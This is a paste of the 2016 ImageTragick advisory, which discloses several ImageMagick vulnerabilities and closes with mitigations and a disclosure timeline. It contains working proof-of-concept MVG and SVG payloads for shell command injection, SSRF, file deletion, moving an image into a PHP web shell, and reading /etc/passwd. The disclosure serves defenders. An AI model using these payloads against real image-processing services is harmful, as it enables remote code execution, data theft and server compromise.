SHARE
TWEET

Untitled

a guest May 3rd, 2016 7,337 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. The exploit was posted at Hacker News comments thread, so it's time to
  2. disclose the full story.
  3.  
  4. Nikolay Ermishkin from the Mail.Ru Security Team discovered several
  5. vulnerabilities in ImageMagick.
  6. We've reported these issues to developers of ImageMagick and they made a
  7. fix for RCE in sources and released new version (6.9.3-9 released
  8. 2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this
  9. fix seems to be incomplete. We are still working with developers.
  10.  
  11. ImageMagick: Multiple vulnerabilities in image decoder
  12.  
  13. 1. CVE-2016-3714 - Insufficient shell characters filtering leads to
  14. (potentially remote) code execution
  15.  
  16. Insufficient filtering for filename passed to delegate's command allows
  17. remote code execution during conversion of several file formats.
  18.  
  19. ImageMagick allows to process files with external libraries. This
  20. feature is called 'delegate'. It is implemented as a system() with
  21. command string ('command') from the config file delegates.xml with
  22. actual value for different params (input/output filenames etc). Due to
  23. insufficient %M param filtering it is possible to conduct shell command
  24. injection. One of the default delegate's command is used to handle https
  25. requests:
  26. "wget" -q -O "%o" "https:%M"
  27. where %M is the actual link from the input. It is possible to pass the
  28. value like `https://example.com"|ls "-la` and execute unexpected 'ls
  29. -la'. (wget or curl should be installed)
  30.  
  31. $ convert 'https://example.com"|ls "-la' out.png
  32. total 32
  33. drwxr-xr-x 6 user group 204 Apr 29 23:08 .
  34. drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
  35. ...
  36.  
  37.  
  38. The most dangerous part is ImageMagick supports several formats like
  39. svg, mvg (thanks to https://hackerone.com/stewie for his research of
  40. this file format and idea of the local file read vulnerability in
  41. ImageMagick, see below), maybe some others - which allow to include
  42. external files from any supported protocol including delegates. As a
  43. result, any service, which uses ImageMagick to process user supplied
  44. images and uses default delegates.xml / policy.xml, may be vulnerable to
  45. this issue.
  46.  
  47. exploit.mvg
  48. -=-=-=-=-=-=-=-=-
  49. push graphic-context
  50. viewbox 0 0 640 480
  51. fill 'url(https://example.com/image.jpg"|ls "-la)'
  52. pop graphic-context
  53.  
  54. exploit.svg
  55. -=-=-=-=-=-=-=-=-
  56. <?xml version="1.0" standalone="no"?>
  57. <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  58. "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  59. <svg width="640px" height="480px" version="1.1"
  60. xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
  61. "http://www.w3.org/1999/xlink">
  62. <image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
  63. x="0" y="0" height="640px" width="480px"/>
  64. </svg>
  65.  
  66. $ convert exploit.mvg out.png
  67. total 32
  68. drwxr-xr-x 6 user group 204 Apr 29 23:08 .
  69. drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
  70. ...
  71.  
  72. ImageMagick tries to guess the type of the file by it's content, so
  73. exploitation doesn't depend on the file extension. You can rename
  74. exploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In
  75. addition, ImageMagick's tool 'identify' is also vulnerable, so it can't
  76. be used as a protection to filter file by it's content and creates
  77. additional attack vectors (e.g. via 'less exploit.jpg', because
  78. 'identify' is invoked via lesspipe.sh).
  79. Ubuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16
  80. x86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest
  81. sources from 6 and 7 branches all are vulnerable. Ghostscript and wget
  82. (or curl) should be installed on the system for successful PoC
  83. execution. For svg PoC ImageMagick's svg parser should be used, not rsvg.
  84.  
  85. All other issues also rely on dangerous ImageMagick feature of external
  86. files inclusion from any supported protocol in formats like svg and mvg.
  87.  
  88. 2. CVE-2016-3718 - SSRF
  89. It is possible to make HTTP GET or FTP request:
  90.  
  91. ssrf.mvg
  92. -=-=-=-=-=-=-=-=-
  93. push graphic-context
  94. viewbox 0 0 640 480
  95. fill 'url(http://example.com/)'
  96. pop graphic-context
  97.  
  98. $ convert ssrf.mvg out.png # makes http request to example.com
  99.  
  100. 3. CVE-2016-3715 - File deletion
  101. It is possible to delete files by using ImageMagick's 'ephemeral' pseudo
  102. protocol which deletes files after reading:
  103.  
  104. delete_file.mvg
  105. -=-=-=-=-=-=-=-=-
  106. push graphic-context
  107. viewbox 0 0 640 480
  108. image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
  109. popgraphic-context
  110.  
  111. $ touch /tmp/delete.txt
  112. $ convert delete_file.mvg out.png # deletes /tmp/delete.txt
  113.  
  114. 4. CVE-2016-3716 - File moving
  115. It is possible to move image files to file with any extension in any
  116. folder by using ImageMagick's 'msl' pseudo protocol. msl.txt and
  117. image.gif should exist in known location - /tmp/ for PoC (in real life
  118. it may be web service written in PHP, which allows to upload raw txt
  119. files and process images with ImageMagick):
  120.  
  121. file_move.mvg
  122. -=-=-=-=-=-=-=-=-
  123. push graphic-context
  124. viewbox 0 0 640 480
  125. image over 0,0 0,0 'msl:/tmp/msl.txt'
  126. popgraphic-context
  127.  
  128. /tmp/msl.txt
  129. -=-=-=-=-=-=-=-=-
  130. <?xml version="1.0" encoding="UTF-8"?>
  131. <image>
  132. <read filename="/tmp/image.gif" />
  133. <write filename="/var/www/shell.php" />
  134. </image>
  135.  
  136. /tmp/image.gif - image with php shell inside
  137. (https://www.secgeek.net/POC/POC.gif for example)
  138.  
  139. $ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php
  140.  
  141. 5. CVE-2016-3717 - Local file read (independently reported by original
  142. research author - https://hackerone.com/stewie)
  143. It is possible to get content of the files from the server by using
  144. ImageMagick's 'label' pseudo protocol:
  145.  
  146. file_read.mvg
  147. -=-=-=-=-=-=-=-=-
  148. push graphic-context
  149. viewbox 0 0 640 480
  150. image over 0,0 0,0 'label:@/etc/passwd'
  151. pop graphic-context
  152.  
  153. $ convert file_read.mvg out.png # produces file with text rendered from
  154. /etc/passwd
  155.  
  156.  
  157. How to mitigate the vulnerability.
  158.  
  159. Available patches appear to be incomplete.
  160. If you use ImageMagick or an affected library, we recommend you mitigate
  161. the known vulnerabilities by doing at least one these two things (but
  162. preferably both!):
  163. 1. Verify that all image files begin with the expected “magic bytes”
  164. corresponding to the image file types you support before sending them to
  165. ImageMagick for processing. (see FAQ for more info)
  166. 2. Use a policy file to disable the vulnerable ImageMagick coders. The
  167. global policy for ImageMagick is usually found in “/etc/ImageMagick”.
  168. This policy.xml example will disable the coders EPHEMERAL, URL, MVG, and
  169. MSL:
  170.  
  171. <policymap>
  172.     <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  173.     <policy domain="coder" rights="none" pattern="URL" />
  174.     <policy domain="coder" rights="none" pattern="HTTPS" />
  175.     <policy domain="coder" rights="none" pattern="MVG" />
  176.     <policy domain="coder" rights="none" pattern="MSL" />
  177. </policymap>
  178.  
  179.  
  180. Vulnerability Disclosure Timeline:
  181. April, 21 2016 - file read vulnerability report for one of My.Com
  182. services from https://hackerone.com/stewie received by Mail.Ru Security
  183. Team. Issue is reportedly known to ImageMagic team.
  184. April, 21 2016 - file read vulnerability patched by My.Com development team
  185. April, 28 2016 - code execution vulnerability in ImageMagick was found
  186. by Nikolay Ermishkin from Mail.Ru Security Team while researching
  187. original report
  188. April, 30 2016 - code execution vulnerability reported to ImageMagick
  189. development team
  190. April, 30 2016 - code execution vulnerability fixed by ImageMagick
  191. (incomplete fix)
  192. April, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)
  193. May, 1 2016 - ImageMagic informed of the fix bypass
  194. May, 2 2016 - limited disclosure to 'distros' mailing list
  195. May, 3 2016 - public disclosure at https://imagetragick.com/
RAW Paste Data
Top